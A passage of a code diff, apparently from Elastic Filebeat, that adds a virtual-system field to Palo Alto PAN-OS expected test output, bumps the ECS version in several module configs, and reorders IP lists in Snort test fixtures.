"panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5836,6 +5891,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5940,6 +5996,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -6044,6 +6101,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -6148,6 +6206,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -6252,6 +6311,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -6359,6 +6419,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -6466,6 +6527,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -6573,6 +6635,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -6680,6 +6743,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -6787,6 +6851,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -6894,6 +6959,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7001,6 +7067,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7108,6 +7175,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7215,6 +7283,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7322,6 +7391,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7429,6 +7499,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7536,6 +7607,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7643,6 +7715,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7750,6 +7823,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7857,6 +7931,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7964,6 +8039,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" diff --git a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json index a6877841bd3..9d86fbf8e1b 100644 --- a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json @@ -80,6 +80,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -189,6 +190,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -301,6 +303,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -410,6 +413,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -522,6 +526,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -631,6 +636,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "web-advertisements", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -740,6 +746,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -849,6 +856,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -958,6 +966,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1067,6 +1076,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1176,6 +1186,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1285,6 +1296,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1394,6 +1406,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1503,6 +1516,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1612,6 +1626,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1721,6 +1736,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1830,6 +1846,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1939,6 +1956,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "web-advertisements", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2048,6 +2066,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "web-advertisements", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2157,6 +2176,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2266,6 +2286,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2375,6 +2396,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2487,6 +2509,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2597,6 +2620,7 @@ "panw.panos.sub_type": "drop", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2706,6 +2730,7 @@ "panw.panos.sub_type": "deny", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2811,6 +2836,7 @@ "panw.panos.source.zone": "trust", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2917,6 +2943,7 @@ "panw.panos.sub_type": "test", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3026,6 +3053,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3138,6 +3166,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3247,6 +3276,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3356,6 +3386,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3465,6 +3496,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "web-advertisements", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3574,6 +3606,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3684,6 +3717,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3796,6 +3830,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3908,6 +3943,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4017,6 +4053,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4126,6 +4163,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4238,6 +4276,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "insufficient-content", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4345,6 +4384,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "insufficient-content", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4457,6 +4497,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4566,6 +4607,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4678,6 +4720,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4790,6 +4833,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4899,6 +4943,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5008,6 +5053,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5120,6 +5166,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5229,6 +5276,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5336,6 +5384,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5441,6 +5490,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5550,6 +5600,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5659,6 +5710,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5768,6 +5820,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5877,6 +5930,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5986,6 +6040,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6095,6 +6150,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6204,6 +6260,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6313,6 +6370,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6422,6 +6480,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6531,6 +6590,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6640,6 +6700,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6749,6 +6810,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6858,6 +6920,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6970,6 +7033,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7079,6 +7143,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7188,6 +7253,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7297,6 +7363,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7406,6 +7473,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7515,6 +7583,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7627,6 +7696,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7736,6 +7806,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7845,6 +7916,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7957,6 +8029,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8066,6 +8139,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8175,6 +8249,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8284,6 +8359,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8393,6 +8469,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8501,6 +8578,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8609,6 +8687,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8717,6 +8796,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8827,6 +8907,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8936,6 +9017,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9045,6 +9127,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9154,6 +9237,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9266,6 +9350,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9378,6 +9463,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9490,6 +9576,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9599,6 +9686,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "web-advertisements", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9711,6 +9799,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9823,6 +9912,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9935,6 +10025,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10047,6 +10138,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10159,6 +10251,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10268,6 +10361,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10377,6 +10471,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10486,6 +10581,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10595,6 +10691,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10704,6 +10801,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10813,6 +10911,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10922,6 +11021,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], diff --git a/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml b/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml index 33545d1ac54..28da2bde50f 100644 --- a/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml +++ b/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/rabbitmq/log/config/log.yml b/x-pack/filebeat/module/rabbitmq/log/config/log.yml index 730ea5c04f3..7ad74c6d0c0 100644 --- a/x-pack/filebeat/module/rabbitmq/log/config/log.yml +++ b/x-pack/filebeat/module/rabbitmq/log/config/log.yml @@ -18,4 +18,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/radware/defensepro/config/input.yml b/x-pack/filebeat/module/radware/defensepro/config/input.yml index a2b133a9dc4..4de8cde78a3 100644 --- a/x-pack/filebeat/module/radware/defensepro/config/input.yml +++ b/x-pack/filebeat/module/radware/defensepro/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/snort/log/config/input.yml b/x-pack/filebeat/module/snort/log/config/input.yml index 17aab4adc03..f0ed0aaa1e7 100644 --- a/x-pack/filebeat/module/snort/log/config/input.yml +++ b/x-pack/filebeat/module/snort/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/snort/log/test/generated.log-expected.json b/x-pack/filebeat/module/snort/log/test/generated.log-expected.json index 2969320816f..78537722d68 100644 --- a/x-pack/filebeat/module/snort/log/test/generated.log-expected.json +++ b/x-pack/filebeat/module/snort/log/test/generated.log-expected.json @@ -335,8 +335,8 @@ "its7829.localhost" ], "related.ip": [ - "10.110.31.190", - "10.157.18.252" + "10.157.18.252", + "10.110.31.190" ], "rsa.crypto.sig_type": "rQu", "rsa.internal.messageid": "5979", @@ -886,8 +886,8 @@ "tper4341.lan" ], "related.ip": [ - "10.210.180.142", - "10.111.33.70" + "10.111.33.70", + "10.210.180.142" ], "rsa.internal.messageid": "NGIPS_events", "rsa.internal.msg_id": "animi", @@ -1009,8 +1009,8 @@ "unturmag6190.api.lan" ], "related.ip": [ - "10.238.223.171", - "10.52.190.18" + "10.52.190.18", + "10.238.223.171" ], "rsa.crypto.sig_type": "Finibus", "rsa.internal.messageid": "16539", @@ -1213,8 +1213,8 @@ "iqu4858.mail.invalid" ], "related.ip": [ - "10.213.100.153", - "10.116.175.84" + "10.116.175.84", + "10.213.100.153" ], "rsa.crypto.sig_type": "exercit", "rsa.internal.messageid": "11634", @@ -2234,10 +2234,10 @@ "Loremips5368.www5.corp" ], "related.ip": [ - "10.65.144.119", "10.166.40.137", + "10.20.167.114", "10.49.190.163", - "10.20.167.114" + "10.65.144.119" ], "rsa.internal.event_desc": "Offloaded TCP Flow for connection", "rsa.internal.messageid": "FTD_events", @@ -2537,8 +2537,8 @@ 